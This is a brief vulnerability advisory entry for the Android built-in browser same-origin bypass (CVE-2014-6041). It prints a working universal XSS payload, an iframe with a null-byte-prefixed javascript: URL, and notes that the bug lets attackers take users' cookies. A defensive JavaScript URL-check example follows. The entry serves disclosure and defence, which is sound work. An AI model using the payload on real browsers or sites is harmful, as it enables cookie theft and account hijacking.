Android built-in browser cross-domain vulnerability (UXSS)

2014-09-05T00:00:00
ID MYHACK58:62201453207
Type myhack58
Reporter Anonymous
Modified 2014-09-05T00:00:00

Description

Related links: http://www.rafayhackingarticles.net/2014/08/android-browser-same-origin-policy.html

Test Link: http://x7s.pw/001.html

> <iframe name="m" src="http://www.myhack58.com/" onload="window.open('\u0000javascript:alert(document.location)','m')"></iframe>

Cause: the Android built-in browser uses an older version of the Chromium kernel, so it inherits a historical vulnerability from that old version; newer versions have already fixed it. Exploiting this vulnerability makes it easy to obtain a user's cookies for a website, and the various browsers and apps that call the Android built-in browser are hit as well.
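
The test string above hides the `javascript:` scheme behind a leading U+0000. As an added example (not code from the original page or from the browser), the code below shows why a URL filter in a web application that compares the raw string misses that prefix, next to a check that normalises first and rejects control characters. The function names, the allow-list and the sample inputs are assumptions constructed for illustration.

```javascript
// Added example: scheme check for untrusted URLs that survives a leading U+0000.
// Function names and the allow-list are assumptions made for this illustration.

const ALLOWED_SCHEMES = new Set(["http", "https", "mailto"]);

// Naive check: inspects the raw string, so any prefix character hides the scheme.
function naiveIsScriptUrl(input) {
  return input.toLowerCase().startsWith("javascript:");
}

// Normalise the way the WHATWG URL parser does before reading the scheme:
// drop leading/trailing C0 controls and spaces, then drop tab/CR/LF anywhere.
function normalise(input) {
  return String(input)
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "")
    .replace(/[\t\n\r]/g, "");
}

// Returns the lower-cased scheme, or null for a relative reference.
function schemeOf(input) {
  const m = /^([a-zA-Z][a-zA-Z0-9+.-]*):/.exec(normalise(input));
  return m ? m[1].toLowerCase() : null;
}

// Strict decision: control characters never belong in a link, and only
// relative references or allow-listed schemes are accepted.
function isSafeUrl(input) {
  if (/[\u0000-\u001f\u007f]/.test(input)) return false;
  const scheme = schemeOf(input);
  return scheme === null || ALLOWED_SCHEMES.has(scheme);
}

// Constructed sample inputs.
const SAMPLES = [
  "\u0000javascript:alert(document.location)", // shape of the test string above
  "  JavaScript:alert(1)",
  "http://www.myhack58.com/",
  "/relative/path",
];

// One row per sample: what the naive check says versus the strict decision.
function report() {
  return SAMPLES.map((s) => ({
    input: JSON.stringify(s),
    naiveFlags: naiveIsScriptUrl(s),
    scheme: schemeOf(s),
    safe: isSafeUrl(s),
  }));
}

console.table(report());
```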


CVE-2014-6041